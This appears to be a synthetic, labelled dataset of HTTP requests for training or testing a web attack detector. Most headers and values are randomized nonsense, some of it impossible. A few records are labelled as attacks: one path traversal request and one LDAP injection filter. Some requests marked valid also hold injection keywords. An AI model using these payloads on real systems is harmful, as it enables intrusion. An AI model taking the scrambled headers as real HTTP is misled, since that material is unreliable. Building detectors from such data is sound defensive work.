If-Unmodified-Since: Fri, 30 Jun 06 07:58:10 CET
If-Match: "JZRGl5-DL7xSCXbT"
If-None-Match: *
If-Range: "STPcwhgbg.01t9jn"
Max-Forwards: 63
MIME-Version: 3.4
Pragma: no-cache
Range: 0-
Referer: http://www.nBlroapE.com/tuiw/EklmsoF/lssslrnn/n6xGlLhc.msf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.2 (Windows; U; Win98 7.0; hm-tr; rv:7.9.0) Gecko/66391210
UA-CPU: 68000
UA-Color: color8
Via: 7.3 www.rqts.jpg, 7.7 www.inel.shtml, ixqy/3.9 www.lsiesecc.jpeg
Transfer-Encoding: compress
Warning: 862 138.235.187.151 "taonetlreetepa7" "Fri, 19 Nov 04 03:03:30 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45314
Start - Id: 34555
class: Valid
PUT /oNHgrUcHM/kJwbNU/sess.cfm? HTTP/1.1
Content-Length: 262
Content-Language: geusi
Content-Encoding: identity
Content-Location: /htmk/hoosni/lkarbsan/daelnff/seQuan.php3
Content-MD5: UnhhdHRvaGVkdUVhSW90Ng==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Dec 09 10:15:51 UTC
Last-Modified: Sun, 06 May 07 18:53:04 UTC
Host: www.sasbadad.cz:36005
Connection: close
Accept: */*;q=0.1
Accept-Charset: macintosh, x-mac-korean
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 71.183.190.111
Cookie: sO4Tre=6l+i'winnt;lwevgn2d=itl84ofeoe9bNiihhU;uwO18jhtaccesV=3ten;sclv=a;f0etfdoew4Soo=&/
Cookie2: $Version="819"
Date: Sat, 27 Nov 04 06:47:28 GMT
ETag: "gY1vMtzXVC4AuJDCwZH"
Expect: yiqyob
From: r4o9@ecoOy.ch
If-Modified-Since: Mon, 07 Sep 09 17:40:37 CET
If-Unmodified-Since: Mon, 09 Feb 04 04:03:24 CET
If-Match: "KlvFZ.fawPyg2N8G"
If-None-Match: *
If-Range: Tue, 10 May 05 17:15:53 GMT
Max-Forwards: 0
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bGNobmljaGtpdFJ4a0tDY2hsbmxGaHI1dG15ZWVjbm9hdHNjbw==
Authorization: eeok tet2l=1Idcnior
Range: 700959-,22-,44069-
Referer: http://tjtdtla.com/ucesgnt/95lLoeti/g2GUrign/i7an.tiff
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/5.6 (X11; U; Open BSD i386 0.4; pk-8n; rv:1.2.3) Gecko/31825540
UA-CPU: Sparc
UA-Disp: 225,732,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 059x5664
Via: FTP/7.4 42.104.118.172:888, 4.7 www.yI8sire.gif, 9.1 158.117.234.127:99765
Transfer-Encoding: compress
Upgrade: tilnna/3.3
Warning: 572 93.181.174.70:9 "Nv99hl5yheexr" "Tue, 08 Jan 08 21:03:46 UTC"
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 899542790
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

ae6seia=kvJ&vOao2bnl31ynht=igkacalsno&W31zCqmPfT=11&iltteatjy=eQI7&ZqRE6jGvselect=ste|Ehr&twkhryooejom5as=ae&egsYIalestna=vSp1cM9f@&atdien=$runiont&ti0mnetRcEntH=mwxioeraqktnpm6&onisicMtm=uoehi&m5dtksrma=50z&DLMfcatT=rthai6aons0sdhr&pEIu=18076807&yo=dAvwhh

End - Id: 34555
Start - Id: 45245
class: PathTransversal
GET /../../? HTTP/1.1
Host: www.ne7T2E.fr
Connection: aoSer
Accept: video/*, text/*;q=0.0
Accept-Charset: x-mac-greek
Accept-Encoding: compress, deflate, deflate;q=0.7, gzip;q=0.4, compress
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 172.49.251.232
Cookie: Tcoqa=Trsbkvseuu;krbruSehmanqdo=et6 ;eitx4D=gfedtrns;nERtxIr=eu81e@
Cookie2: $Version="453"
Date: Mon, 13 Dec 04 24:40:14 GMT
ETag: W/"TC1C.R6SZLoWaRYE"
Expect: nT6mf=6igw
From: pdeOseO@dTeieho.org
If-Modified-Since: Mon, 26 Apr 10 02:37:03 UTC
If-Unmodified-Since: Mon, 01 May 06 14:35:36 UTC
If-Match: *
If-None-Match: "Wh09e26zYoUqMEo"
If-Range: Thu, 26 Feb 09 18:52:01 CET
Max-Forwards: 8
MIME-Version: 1.7
Pragma: 6o2iTn='e7h'
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM bWVzdG1zdHJzZWFhYXlkaG9JZjZ2a2c3dG9sYWluMm5UYzJvbw==
Range: 220-5761,42620-
Referer: http://tenmt6t.fr/kneu8x.asmx
TE: chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: 5apbrTddexoa
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: nneodo/9.9 www.8ar3eob.jpg:0444, wreTl/9.0 111.212.219.44:0, 7.6 212.203.15.0
Transfer-Encoding: gzip
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45245
Start - Id: 5682
class: Valid
POST /neShdtshboW0roceoA/eerfri/ercqdMhydseo/looepypt7paptcfiWsmh/ytls4sraseEc6.msf? HTTP/1.0
Content-Length: 196
Content-Language: weflt2,bacteh,nna
Content-Encoding: deflate
Content-Location: /nwye/bdeHh.jpeg
Content-MD5: aWlvbHRlc2VvYWVReWFGNg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Nov 07 18:24:27 CET
Last-Modified: Tue, 07 Oct 08 22:14:44 GMT
Host: www.tmste1eq.ch
Connection: close
Accept: text/html, audio/basic, application/*;q=0.0
Accept-Charset: windows-1255, x-mac-roman, iso-8859-15;q=0.6, x-mac-arabic;q=0.4, iso-8859-1
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: azn='wrp'
Client-ip: 52.203.165.218
Cookie: eebn=fhjdelete@t@ehmailarm a5a;pm3heaaceepaqa=gand;rine9cgmiliRe=033136668;o8yont=912;nszcatelsLs=388404;eONhye9eiY=$5e:shutdownnthlstn%tphp
Cookie2: $Version="1"
Date: Wed, 18 Jul 07 01:21:12 GMT
ETag: "gA-VXXIIO8mh8_lp"
Expect: pige=eph8;ttll6v
From: 6onsas@rsaEn.cz
If-Modified-Since: Thu, 15 Oct 09 16:00:20 GMT
If-Unmodified-Since: Sat, 12 Feb 05 16:57:27 UTC
If-Match: "aUZ1qzfIMy@o7mswACzU"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 8.0
Pragma: inh=s
Proxy-Authorization: 5emer ephane=n6oq
Authorization: Digest response="97BFaA43715eD41DAdeb6cd6C9b45cfA"
Range: -816900,24457-
Referer: http://irwswu.net/0ooa4asd/nwouay/beaf.msf
TE: gzip,trailers,deflate
Trailer: Accept-Encoding
User-Agent: lmrtnbmfo (nTyCyPn; erdPpEfV; tkWSwpEC; oMTL@oG)
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 327x1132
Via: 4.1 62.7.158.126, nato/2.0 233.230.181.234, 66rt/3.6 www.ouaw.jpg
Transfer-Encoding: vhniRm; ofpannue=uesk
Upgrade: tou/1.5, iievh/5.0, uedx/3.7
Warning: 162 253.233.234.60 "iILnb" "Mon, 07 Nov 05 13:32:13 UTC"
X-Forwarded-For: 33.1.105.183
X-Serial-Number: 7835393170
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sdISUz=64&rhTrTtatAc8eEl=342600&ent7Aehekbn=73&W_rU5=ke&oterglmljhtoo=dny8>:tee&led=x selectdelete|&gSVJYE5=zaEoTu&ee=146&kyEog=z2aze&m89ivkml=hW4x7L&tneetMhqfYntde=$&eyGtnherbodOph=689291

End - Id: 5682
Start - Id: 22600
class: Valid
GET /2tyrdbxnhy3rrsbiun5/hrn2uhde6d7oo7q3sbk/9_Ozl6SaHMK_3Q/anntdhCrt/IRcmdusrpHCEy/zrg.msf?Eee=177&zatJsigtt2hnNdd=2141&Owear0rFdhm=%2B&e9gyiedia=nSpt&isEoootRngl=io+&rtglselqar=if0hithehsStAtt&s8e7rCfyney=Oasinserta HTTP/1.0
Host: www.etildaow.uk
Connection: Atosh
Accept: */*
Accept-Charset: euc-jp, iso-8859-8-i;q=0.7, x-mac-arabic;q=0.2
Accept-Encoding: *
Accept-Language: r-rbtA;q=0.2, l-t5c, t-cvei;q=0.4
Cache-Control: max-age=67219
Client-ip: 182.155.75.50
Cookie: ecwkte4tcmuru=e1t <ig ni9a-grgrde;lqr41ny6vtielt=00
Cookie2: $Version="31"
Date: Wed, 05 May 10 22:03:57 CET
ETag: W/"4O-BCzJQC74ep8dft"
Expect: 100-continue
From: tamegP8@NaDasMP.be
If-Modified-Since: Sat, 24 Mar 07 02:32:38 CET
If-Unmodified-Since: Thu, 20 Sep 07 11:02:11 CET
If-Match: "jtLgPPMmzZ6t3GN"
If-None-Match: "uV9HXnS@5l94IMCkqnEu"
If-Range: Sat, 03 Dec 05 10:53:48 CET
Max-Forwards: 1438
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: nrtei onnr=ngsfiYie
Authorization: nbosI7 l3qhicnd=rsekAkf
Range: 5-,-1
Referer: http://www.uc8ey.fr/rrftwla/ie1ndoDa.jpeg
TE: trailers,chunked;q=0.6,chunked
Trailer: Expect
User-Agent: Otnede (dzF4j9p; afLirMJQf)
UA-CPU: MIPS
UA-Disp: 9434,874,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6216x6265
Via: uaRrz7/5.4 www.osPrT.tiff, HTTP/5.9 165.9.10.152:3584
Transfer-Encoding: cErt; tisy=uusi
Upgrade: txsikk/4.1, hnh/1.7, bte/4.1, eAsee/7.7, Ei7rcc/1.1
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 246.209.203.242
X-Serial-Number: 8769415
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22600
Start - Id: 21761
class: Valid
GET /re_rLv@.png?0a_aj=o%40%40rh2Dc&deo5invr=dcy8asasne0aie0e&revnrql6t=808001&ernaeamdJmybaha=kusr%2B%5Dk%5B&0trid=ir0at&rphteTdE=andexecgnpqeaeOf&nnibj2essm=r8gGU..%40Gy HTTP/1.1
Host: 228.132.84.150
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: creraet=aet
Client-ip: 139.3.29.237
Cookie: te=i@IXyZwBH@TV;4rwstorr=s7sfte1tgeRvep;efmd=inlpositionttahsw
Cookie2: $Version="0"
Date: Sat, 05 Jun 04 24:19:00 CET
ETag: "BXLJOD4_0O_dzcr"
Expect: 100-continue
From: twiato@ahnEode.ch
If-Modified-Since: Sun, 04 Jan 09 11:24:26 GMT
If-Unmodified-Since: Wed, 07 Jan 04 21:51:18 UTC
If-Match: *
If-None-Match: "MWHBYxCr6Y2mQXGfkygy"
If-Range: Wed, 22 Jul 09 22:28:07 UTC
Max-Forwards: 575
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: Basic bnRhbnc3OmV2ZWRl
Range: 4-,-68,1577-
Referer: /chntuf/sAne/o9nozoy.swf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.6 (X11; U; Unix 1.3; o4-ea; rv:7.1.4) Gecko/91701957
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9055x3634
Via: eeved/9.1 54.104.221.208
Transfer-Encoding: identity
Upgrade: eHnt/5.0, 67efl/0.5, 1Gato/8.8, ssn/0.2
Warning: 636 0.247.245.254 "swrecumaca" "Mon, 28 Apr 08 13:52:46 UTC"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 229103908276446605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21761
Start - Id: 5727
class: Valid
PUT /iwinntsock_streamT/yojqa/yh2RkP/6gGsCh8gJPUW.jpg? HTTP/1.0
Content-Length: 299
Content-Language: 0etnez2,olbt6rTe,pniovn7
Content-Encoding: gzip
Content-Location: /oeye.rar
Content-MD5: Y21hc2dldnlJeGhtYXNlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Oct 04 21:16:43 UTC
Last-Modified: Sun, 29 Aug 04 20:12:58 CET
Host: www.reolas.gov:85
Connection: keep-alive
Accept: text/*;q=0.9, text/plain
Accept-Charset: x-mac-japanese, utf-7, iso-2022-kr
Accept-Encoding: deflate;q=0.9
Accept-Language: nemswSd9-0iAt;q=0.7, stnoq2gu-rus4c;q=0.7, oen-Xh;q=0.1
Cache-Control: max-age=471
Client-ip: 219.146.51.19
Cookie: jSaa=no5Pn1;rrsrtgwaeaMehiw=0@dQJb;scriptKu6d=hEsg;og6a=359605;KriDLnetcats3_Jd=2625920
Cookie2: $Version="54"
Date: Thu, 31 Jan 08 06:07:56 UTC
ETag: "jiQXasEX@2DVqAIvgOV"
Expect: 100-continue
From: ototLn2u@5heey.uk
If-Modified-Since: Wed, 16 Apr 08 02:01:32 UTC
If-Unmodified-Since: Tue, 02 May 06 22:08:19 UTC
If-Match: *
If-None-Match: "cWIpMUyBFa6D@W-s"
If-Range: Mon, 21 Jun 04 18:46:31 UTC
Max-Forwards: 210
MIME-Version: 9.3
Pragma: M=getam
Proxy-Authorization: NTLM YWVueHJpMXNlaGJoRHRqcmd4YW9Tck5lN29hZWhuQkkzZG1mbG9z
Authorization: NTLM ZWFsZWFvcnpzckJmSW5LZTVvbm1ldGVjbGludGU1TG00bG90YnU=
Range: 40090-
Referer: http://ehdteyrh.be/isieooE.jpeg
TE: trailers,chunked;q=0.1,trailers
Trailer: User-Agent
User-Agent: erAnmraayexEqda
UA-CPU: PowerPC
UA-Disp: 830,2987,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3416x9061
Via: HTTP/6.4 www.wIaoznom.js, HTTP/9.8 204.236.97.165, 0.7 www.fSd9ra.jpg
Transfer-Encoding: deflate
Upgrade: dsmp/7.1, uiviit/8.6
Warning: 489 154.132.50.60 "g8mjyetalehBscHn" 
X-Forwarded-For: 129.100.56.49
X-Serial-Number: 84946
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Fxml9-yQlmfK=eatEmeeow2dite&snWeelsvrtre=59852&17oE=4313725&gO5iFaoeiegzt=hFnadSreenEntdee&drabil5Ytiwn8rl=group byy8it6ymf&enhtt=3uqHc-HhXRp&4Wa=7052078319&t3g.oracceptOyrgY=297&of=5n8Ir&me95I1Tyb5ee=dtect&osOLol=9229254543&ls7rrNndmlr6he= igga&caUa306rs=834&Eklt=E6esascript1elis&rjmmeh8oad7dsdh=6

End - Id: 5727
Start - Id: 8970
class: Valid
GET /xT/kxpbYGQXZ9j10/mujXD/lK9/uidarhaEiEpccSlnh0/aR5irtaeesrmuiEhldg.gif?ue5=h++&ciu3fielpkeh=0&ieninvcd=75101&1Rleithapk=ru%29Ot%7C&atoumlYrnbo3f=7046&nCzj=ee29&bMoDshutdown0MsystemZ0t=sbea%27&EcidzdC=hx%2F%5B%3Bfnvred&2oolcaT2hclue=ezq%24tmp&OzT=pd&atnrugqteisise=lturw&tos4iepOnriyae=s%7Eidiv+n%40window.open%3Ela&a6tr=6299766704&f_S9tWQB=86432887&hoap=96 HTTP/1.0
Host: 137.199.255.39
Connection: close
Accept: image/*, application/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: 6-utlhod;q=0.2, trD7elb-nihl;q=0.1, eunse-tlforhag, 0s-4se, oom-Ysvd;q=0.1
Cache-Control: min-fresh=53375
Client-ip: 25.85.108.94
Cookie: ttmyd0t=xc;hqshmid=2Fhoeatn&nzaotAowftp=o;UrpheR7laitsg=bhRMsVSkui;rlsRuoscelD=vi
Cookie2: $Version="14"
Date: Wed, 04 May 05 19:26:54 UTC
ETag: W/"sdkJlwrFwFSq8n-fFo"
Expect: 2dns
From: enona@meryupld.st
If-Modified-Since: Fri, 29 Feb 08 12:33:25 GMT
If-Unmodified-Since: Tue, 12 Aug 08 12:10:12 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 18 Jan 07 14:39:21 CET
Max-Forwards: 04
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: tNnw Thot=heMot0um
Authorization: NTLM eXNyaGVzZXNzTW5lYmhlNWVucmVub3J5cGVhbHJyZVlpYXRNd3BEbmhp
Range: 3916-,2-4
Referer: /5ipn.php3
TE: trailers
Trailer: Trailer
User-Agent: asnne/4.1.2
UA-CPU: PowerPC
UA-Disp: 7331,790,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7350x9086
Via: hanec/6.8 6.103.141.83:703, 8.1 13.88.207.26
Transfer-Encoding: trUEs
Upgrade: dRre6/9.2, ntj/6.7, Fwu/3.4, rm5wer/2.6, 4eaei/3.5
Warning: 247 www.nekn6rAe.htm "a78cpakr" "Tue, 30 Jan 07 10:22:39 CET"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 982389544
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8970
Start - Id: 6706
class: Valid
PUT /dQDDyyZn_Ouw8lnBfA5m/tgh/ezv4_DgXrshL@MN4l.asp? HTTP/1.0
Content-Length: 41
Content-Language: foe6m8,esndt
Content-Encoding: identity
Content-Location: /lte7/e7cTn9/whenpte/netSEdl.tar.gz
Content-MD5: dWE2c29odTluc2dydGdudA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Apr 04 04:43:43 UTC
Last-Modified: Sat, 12 Jun 04 21:19:46 UTC
Host: www.htITp.cz:93
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tvlc4t-e3m;q=0.7, y-oEi;q=0.6
Cache-Control: no-transform
Client-ip: 52.136.26.201
Cookie: attT0tstai8nnc=ocinevp;5E=3157;I1Gvfd2SF0Q=7245;uExobawe1canq5=Oo;t9aqinkl=dnCshd8do7w
Cookie2: $Version="28"
Date: Thu, 07 Oct 04 17:24:00 CET
ETag: W/"CB7UY3Iuxzo9ckHh"
Expect: 100-continue
From: knj5rt@a7eaent9k.cz
If-Modified-Since: Sun, 07 Oct 07 15:12:35 GMT
If-Unmodified-Since: Mon, 09 Oct 06 10:46:33 CET
If-Match: *
If-None-Match: "-uWfzGYscum7QbffvV"
If-Range: Fri, 08 Oct 04 13:23:30 UTC
Max-Forwards: 6657
MIME-Version: 7.3
Pragma: sstxt='aameisn'
Proxy-Authorization: dsaeS r0s5=eu7h
Authorization: Basic b3NoN246aE9uYmw=
Range: 1-26363
Referer: http://1mept9.st/nqdetit/nesgci.pdf
TE: gzip;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.6 (X11; U; Open BSD i386 7.4; fn-fl; rv:2.1.8) Gecko/46667010
UA-CPU: Sparc
UA-Disp: 035,576,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6725x789
Via: 0.8 www.epmno39m.css, FTP/1.6 www.gruim.shtml
Transfer-Encoding: deflate
Upgrade: hrutt/6.0, tbuzs/0.5, iar/0.3, u7e4ae/3.3
Warning: 140 www.wlcdRbR.tiff:3 "8erstzIi" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

motmexCan=toi&7bodyF6rD=m3hiseojsl9sW?o

End - Id: 6706
Start - Id: 38690
class: LdapInjection
GET /d9fBVnnG4b50/s8optZeqVO-6CPSR@/fe/i4joUP7cwpsFE@RB/sB6HTyxvGzLxRNrl-A/maOodsopuaPhnz3l/hg2KEgVBPW/eyHROtc8MKKuGwQ/uzgipaeRmr/tek42_3nUogTlCfIjRmP/nFFhgTOSQML9n/fg7tg8m-y0.gif?tysncvsf5reb=%291%3C&tusnoaewysaefdw=tiljULQU&Mr05=fziz2h6&isomhy=tta%269%24gsdntWg&uut2st=64673&kivvdTle5gp=t4H0QNe_t&nu5chrorgfvtmmq=eltopSQu_&eoeb2iwclk0ruoi=rtgot&pY9=szVr9s6Rl5&rdrserotteha=n+aEh%3Feai0tn&Szhaao=bilv8owy&hbautdhrueott=tm%3Ftfa&hlo=%5Bym&f0RW_ydocument74xq=93379649&Itcw=%29++%28+%7C+++%28cn%3D*o+++%27brien*%29%28mail+++%3D*o+++%27brien*+%29++ HTTP/1.1
Host: 94.187.104.164:053
Connection: hddfa
Accept: image/*;q=0.8
Accept-Charset: iso-10646-ucs-2;q=0.2, windows-1252
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 19.47.61.99
Cookie: 8sa2oaaasT9xcwi=htpofec8nc(dsjl|io;m4nScsoe9lddnRw=50
Cookie2: $Version="63"
Date: Thu, 26 May 05 17:43:13 UTC
ETag: "EvxKQQHQRlpZyyner"
Expect: 100-continue
From: nTromT8u@pzcel.it
If-Modified-Since: Fri, 02 Jul 04 24:01:21 UTC
If-Unmodified-Since: Sun, 30 Apr 06 23:43:38 CET
If-Match: *
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: "Wv9gL_-obcZFL69mR5OV"
Max-Forwards: 6840
MIME-Version: 5.4
Pragma: eu='ttL'
Proxy-Authorization: Digest realm
Authorization: Ns5wt sihbnas=Atnr6O
Range: 32-1,3888-481886
Referer: http://tmnehs.fr/foEle/aqoah1s.pl
TE: deflate;q=0.7,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.2 (Windows; U; Win 9x 9.4; ep-gt; rv:9.9.8) Gecko/00234715
UA-CPU: 68000
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 420x9995
Via: 0.1 www.dida.jpeg, 3.6 178.2.65.161, tkUtN/6.4 www.dyvlseh5.htm
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 502 www.ssta3set.jpeg "SptsmeMga8ettons" "Wed, 02 Apr 08 05:31:51 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38690
Start - Id: 3753
class: Valid
GET /bryGS5re/29d7dbGnefYtutpssri/Ka_C7evcmd.jsp?j4ms4segeE7nflp=loor%5Cg&OomcAyEl7mcUd=30 HTTP/1.0
Host: www.rztghtm.uk
Connection: 4sEelrNl
Accept: image/gif;q=0.1
Accept-Charset: isiri-3342, windows-1250
Accept-Encoding: gzip, gzip;q=0.9, identity
Accept-Language: *
Cache-Control: ogeurt='5v'
Client-ip: 189.130.61.103
Cookie: BeqetinsEoew=group bysyiuih r;aqiyeeehtssrla=6849369740;onyprThecri1=iserouqHesns
Cookie2: $Version="229"
Date: Sun, 22 Feb 09 10:16:40 UTC
ETag: W/"LDtMPRZa9qNqstK-r2V"
Expect: rchnyo8k
From: cfidsd09@nujp.org
If-Modified-Since: Mon, 09 Oct 06 07:19:50 CET
If-Unmodified-Since: Fri, 01 Sep 06 02:13:32 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Apr 07 05:54:53 UTC
Max-Forwards: 24
MIME-Version: 0.5
Pragma: tztoj=aOeNTf
Proxy-Authorization: Digest realm
Authorization: Basic dHRzaTg6aTkzbDE=
Range: -610282,410-9040,-6457
Referer: /otHes/eejdn/oCochf/4i83ireA.asmx
TE: trailers
Trailer: Date
User-Agent: Mozilla/0.3 (Windows; U; Windows NT 1.9; 95-rf; rv:3.9.0) Gecko/63776572
UA-CPU: StrongARM
UA-Disp: 079,793,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0475x7705
Via: 6.9 58.253.9.62
Transfer-Encoding: identity
Upgrade: dboo/3.7, re6/8.7, gnby3e/0.4, lce/6.4, esii/2.5
Warning: 367 12.156.245.18 "Otmdscjdta" 
X-Forwarded-For: 2.28.238.117
X-Serial-Number: 68867877
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3753
Start - Id: 6115
class: Valid
PUT /rHhrPxSTx5LWBcS/tYG/hKrOFaj/Ainnlsxmhement/os3tOGR/tazEmadb8icn1eMnie/y9EE3uo.aspx? HTTP/1.1
Content-Length: 155
Content-Language: ionmqwn
Content-Encoding: gzip
Content-Location: http://www.nhuetIy.ch/ts9z/0uetuatr.gif
Content-MD5: ZXNlZmJ0bzRsdnRlcFlkYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Sep 04 20:45:27 GMT
Last-Modified: Tue, 02 Dec 08 13:37:32 CET
Host: 154.103.68.17:8
Connection: keep-alive
Accept: text/plain;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nTrerO-et5hwm, njeRWui2-sYuIy, oocr-7sgu
Cache-Control: no-store
Client-ip: 81.38.114.207
Cookie: swe=2745743;heT=055534147;ghiosothpehb=k746u3_kK;lAfsm7eaearse4=evBzKfQAgvi
Cookie2: $Version="97"
Date: Sun, 07 Nov 04 04:28:49 CET
ETag: "FjAysqu8TlLKoFWdNq"
Expect: 100-continue
From: nwqTu@iinmi.st
If-Modified-Since: Tue, 16 Oct 07 02:58:06 CET
If-Unmodified-Since: Fri, 24 Oct 08 21:03:07 GMT
If-Match: *
If-None-Match: "p9GwTCq-H8YEvhGky"
If-Range: Wed, 13 Aug 08 22:55:02 CET
Max-Forwards: 5807
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM b3hpaDV0NGV1ZWhyc3JvcGVyZW9HcmFTdG5uYUFUaXI=
Authorization: o7aot rtinrir=h7teeeie
Range: 6-86083
Referer: /txsci/gariok/tlgOh/otds/nezs.conf
TE: chunked;q=0.4,gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/5.6 (X11; U; Linux i386 8.2; tn-xx; rv:5.9.2) Gecko/21252472
UA-CPU: PowerPC
UA-Disp: 395,743,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 904x539
Via: 4.5 www.ser7sm.js, FTP/1.5 www.inedyiAc.css, 5.4 131.51.186.174:017
Transfer-Encoding: deflate
Upgrade: mhds/5.5, nbntm/4.8
Warning: 650 69.47.85.230 "eneld6Odeonlenmnn" "Tue, 12 Aug 08 13:16:53 CET"
X-Forwarded-For: 146.137.164.24
X-Serial-Number: 763044714398
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a4=atIi&_open@9kcmdYconnectkMf=673&xjx2img2FR9Z=acnsom8m&oI.FF=52034&oo7atiytrsw=33155766&mseirt=nIecohb8 cpasswd5&ttTag5tsooxt6m=u4vEKM9UE-&rylexhu=279278

End - Id: 6115
Start - Id: 31536
class: Valid
GET /vxpbYQdrdAwZ0i2c/itaAteiuhoe30/edTc/tH/oKTTGdyH6GHUTNg1@/home97/7X.8spbgmaillxZQSC/unliraTthcdceiunl5e/lwcuyTz.Yh/cub55WytkNsIee5eyhs/8rrcefarheo/qt.bin?eariladf=f&FH5xFjWFEfRb=8e&etpe=awxnezvef&u6d=86577&fmBPtmsfeih=%5Byo&ozh9Ar4hma=08&S5g=tjnNn9wh&7saosofEfotn=65428&5neyRa=97579782&hEktd=ePex3M&ueLeEeeoi=y%3D%3C+&0WbesiIloeemsw=U%5C4itn0hyiageY&deniz4mllT=smf HTTP/1.1
Host: 141.91.18.171:7405
Connection: keep-alive
Accept: video/quicktime, audio/*;q=0.1, image/*
Accept-Charset: x-mac-korean;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=75
Client-ip: 200.43.122.246
Cookie: tRJghollinku=aWsO_t9j;etnmDeartna=8;ycdxarestBp=k f:;~;xf2Rldec=4693685
Cookie2: $Version="2"
Date: Mon, 04 Jun 07 14:18:53 UTC
ETag: W/"bJYpcHqH2KiXealz"
Expect: 100-continue
From: ahsso@hyas.biz
If-Modified-Since: Sun, 18 Nov 07 19:17:55 CET
If-Unmodified-Since: Mon, 18 Dec 06 19:16:49 CET
If-Match: "grG7ADa7uXv0lBM3"
If-None-Match: *
If-Range: Fri, 04 Jan 08 14:49:31 CET
Max-Forwards: 5
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM dE1laXRucXB0bjJ0ZGRybHlpYW9ubm50c3JobnVtZXpoZGhhZWU=
Authorization: Basic aXllb0VjTjpydDdWc2Fp
Range: -2245
Referer: http://binhr.it/mPEn/reoed6s/s4mdr/iuOtcn/fs4n.txt
TE: chunked
Trailer: Authorization
User-Agent: ctanu51e (sWiMNF9; eoZcN8k; ra2sqp; ePzIat)
UA-CPU: x86
UA-Disp: 5662,024,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 362x515
Via: 6.7 222.27.138.169
